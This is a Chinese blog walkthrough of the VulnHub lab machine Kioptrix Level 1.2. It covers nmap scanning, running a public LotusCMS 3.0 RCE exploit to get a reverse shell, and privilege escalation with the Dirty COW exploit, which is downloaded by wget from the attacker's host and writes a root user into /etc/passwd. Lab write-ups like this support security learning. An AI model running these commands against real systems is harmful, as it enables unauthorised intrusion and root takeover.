【vulnhub】Kioptrix : Level 1.2

最新推荐文章于 2024-09-06 14:33:08 发布
最新推荐文章于 2024-09-06 14:33:08 发布
阅读量292 收藏 6
点赞数 3
文章标签: 网络安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wbplife/article/details/140782726
版权

信息收集

使用nmap发现靶机IP

进行端口扫描,发现开放22、80端口

nmap -A 192.168.93.151 -p 1-65535

进行网址访问IP

点击login,进入登陆页面,发现该网站cms为:LotusCMS

进行目录扫描

拼接/modules/ ,存在目录遍历

拼接/phpmyadmin

使用searchsploit搜索LotusCMS的历史漏洞,发现该CMS版本为3.0时存在命令执行漏洞

searchsploit LotusCMS

漏洞利用

使用了一个python版本的exp:GitHub - nguyen-ngo/LotusCMS-3.0-RCE-exploit

github里面搜索LotusCMS-3.0-RCE-exploit,下载并解压到kali

构造payload,反弹shell

python3 lotuscms.py -rh 192.168.93.151 -rp 80 -lh 192.168.93.130

192.168.93.151是靶机的ip

192.168.93.130是kali的ip

监听444端口,因为从下载的文件说明中可知,监听端口必须是444

获取交互式shell

python -c 'import pty; pty.spawn("/bin/bash")'

提权

使用命令uname -a查看靶机的内核版本信息为:Linux Kioptrix3 2.6.24-24-server

使用命令cat /etc/*-release查看靶机的发行版本信息为:Ubuntu 8.04.3 LTS

使用searchsploit查找符合内核版本和发行版本的历史漏洞,漏洞很多

直接使用经典的脏牛漏洞

将exp下载下来,使用web服务上传到靶机,编译执行,在/etc/passwd文件写入一个具有root权限的用户

searchsploit -m 文件名字进行下载

挂到服务上面,进行远程下载

主机:
python3 -m http.server

靶机:
cd /tmp
wget http://192.168.93.130/40839.c
gcc -pthread 40839.c -o 40839 -lcrypt

运行这个编译过后的文件,设置密码123456,会自动生成一个用户,跳转到这个用户

查看/etc/passwd,发现这个用户已经再里面了

进行跳转到这个用户

wbplife
关注
  • 3
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
KIOPTRIX: LEVEL 1.2-VulnHub靶机学习第四篇
qq_27466929的博客
09-04 1070
VulnHub靶机学习第二篇:KIOPTRIX: LEVEL 1.2
Vulnhub靶机系列:Kioptrix: Level 1.2 (#3)
汗的博客
04-01 869
这次的靶机是Vulnhub靶机: 文章目录靶机地址及相关描述靶机设置利用知识及工具信息收集并getshell提权总结 靶机地址及相关描述 靶机设置 老规矩,开启虚拟机前分配一个和攻击机一样的网卡,选择我已移动该虚拟机;开启虚拟机后,netdiscover确认一下目标,我的靶机ip为 利用知识及工具 信息收集并getshell 提权 总结 ...
Vulnhub靶机:Kioptrix_Level1.2
qq_48904485的博客
03-14 442
运行环境:Virtualbox攻击机:kali(192.168.56.101)靶机:Kioptrix_Level1.2(192.168.56.106)目标:获取靶机root权限和flag靶机下载地址:https://www.vulnhub.com/entry/kioptrix-level-12-3,24/
vulnhub靶场】Kioptrix : Level 1.2靶机提权
qq_46421742的博客
07-26 297
免责声明:本文属于个人笔记,仅用于学习,禁止使用于任何违法行为,任何违法行为与本人无关。
Kioptrix1.2超详细靶机实战
weixin_68615160的博客
07-30 205
发现开启了22、80端口。
VulnHub渗透测试实战靶场 - KIOPTRIX: LEVEL 1.2
LYJ20010728的博客
08-09 1194
VulnHub渗透测试实战靶场 - KIOPTRIX: LEVEL 1.2环境下载KIOPTRIX: LEVEL 1靶机搭建渗透测试信息搜集漏洞挖掘getshell提权 环境下载 戳此进行环境下载 KIOPTRIX: LEVEL 1靶机搭建 将下载好的靶机导入Vmware,网络连接设置为NAT模式即可 渗透测试 信息搜集 用arp-scan探测一下网段内目标靶机的IP:sudo arp-scan -l 得到目标靶机的IP为:192.168.246.135 用Nmap探测一下目标靶机IP的端口
KIOPTRIX: LEVEL 1.2 (#3)
Katarina__的博客
09-04 641
KIOPTRIX: LEVEL 1.2 (#3) 攻击机IP:192.168.253.143 靶机IP:192.168.253.144 一、信息收集 1、确定目标主机IP、开放端口 使用netdiscover确定网段内目标主机。 netdiscover -i eth0 -r 192.168.253.0/24 (主动探测网段内活动主机) 也可使用nmap扫固定网段 nmap -sP 192.168.253.0/24 找到ip后,可继续使用nmap探测此主机的开放端口等信息 nmap -n -
KIOPTRIX: LEVEL 1.3-VulnHub靶机学习第五篇
qq_27466929的博客
09-11 1252
VulnHub靶机学习第二篇:KIOPTRIX: LEVEL 1.3
Kioptrix Level 1 渗透方案
SecUpdate的专栏
06-22 3155
目标:Kioptrix Level 1[VMWare] 本机环境:BackTrack5 RC3[VMware](192.168.74.145) 网关:192.168.74.254 使用工具:nmap #1:查看 Kioptrix 在内网的IP地址。 工具:nmap 命令:nmap 192.168.74.0/24 –n –sP -sn 得到IP:192.168.74.1
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8449
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
【盖世汽车-注册安全分析报告】
09-02 1389
盖世汽车(上海盖世网络技术有限公司)是汽车产业专业的信息服务平台,为企业及行业人士提供一站式服务。
【精选】文件摆渡系统:跨网文件传输的安全与效率之选
文件数据安全交换
09-06 908
同时满足安全与效率兼顾的文件摆渡系统,那就是Ftrans飞驰云联的《Ftrans Ferry跨网文件安全交换系统》,这是一款由飞驰云联自主研发的安全产品,可以有效解决内外网间、多个网络之间、HPC环境下、云租户之间的跨网文件摆渡需求,通过多审核审批、日志审计、防病毒、DLP检测、传输加密、权限管控、传输加速等,实现统一的文件摆渡安全管控,提高网间数据交互效率。支持企业微信、钉钉等进行消息通知集成。系统内置DLP检测功能,可检测文件的大小、文件名、文件个数、文件来源、敏感内容、文件类型、是否含有病毒等。
高端控制台使用过程中如何保证用电安全
JiaDeLi_console的博客
09-03 485
因此,在使用过程中,采取有效措施确保用电安全,不仅关乎设备寿命,更直接关系到人身安全及数据安全。同时,增强员工的安全意识,让每个人都成为用电安全的守护者,共同营造一个安全、稳定的工作环境。在高端控制台的使用过程中,可以引入智能监控系统,实时监测电力参数、环境温度等关键指标,一旦发现异常立即报警,为及时处理问题提供有力支持。总之,高端控制台使用过程中的用电安全是一项系统工程,需要从电源布局、设备选型、日常维护、人员培训以及智能监控等多个方面入手,全方位、多角度地确保用电安全,为设备的稳定运行保驾护航。
网络安全售前入门09安全服务——安全加固服务
打工人
09-02 1319
安全加固服务是参照风险评估、等保测评、安全检查等工作的结果,基于科学的安全思维方式、长期的安全服务经验积累、对行业的深刻理解、处理安全事件的最佳实践,为客户提供完善的安全加固方案,并在客户侧反馈完成加固后,提供二次评估服务,从而帮助客户达到修补信息系统脆弱性,提高系统安全性,满足相关政策法规的目的。
一次性解决 | 网站被提示“不安全
最新发布
liushuai66888的博客
09-06 351
部署SSL证书:如果网站尚未部署SSL证书,需要购买或获取一个由权威证书颁发机构(CA)签发的SSL证书,并安装在服务器上。安装证书后,网站就是经过第三方CA验证过的,浏览器就会信任这类网站,也就不会在提示“不安全”。通过以上步骤,可以一次性解决网站被提示“不安全”的问题,提升网站的安全性,保护用户数据,并增强网站的品牌形象和用户信任度。如果自己不熟悉SSL证书的安装和配置,或者遇到难以解决的问题,建议联系专业的技术支持人员或网络安全专家来帮助解决。检查证书链:确保证书链完整,没有缺少必要的中间证书。
思科交换机端口安全配置1
2302_76730689的博客
09-02 1017
2配置交换机B的主机名称,创建vlan 10和vlan 20,将f0/1、2划入vlan 10,f0/3、4划入vlan 20,将f0/24配置为Trunk。#3配置交换机A的主机名称,创建vlan 10和vlan 20,并vlan 10和vlan 20 的SVI接口配置IP地址,并启用交换机的路由功能。#4在Switch-B上针对不同vlan 的主机配置端口安全
API安全 | 发现API的5个小tips
2301_80115097的博客
09-05 645
安全测试目标时,最有趣的测试部分是它的 API。API 是动态的,它们比应用程序的其他部分更新得更频繁,并且负责许多后端繁重的工作。在现代应用程序中,我们通常会看到 REST API,但也会看到其他形式,例如 GraphQL 甚至 SOAP。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值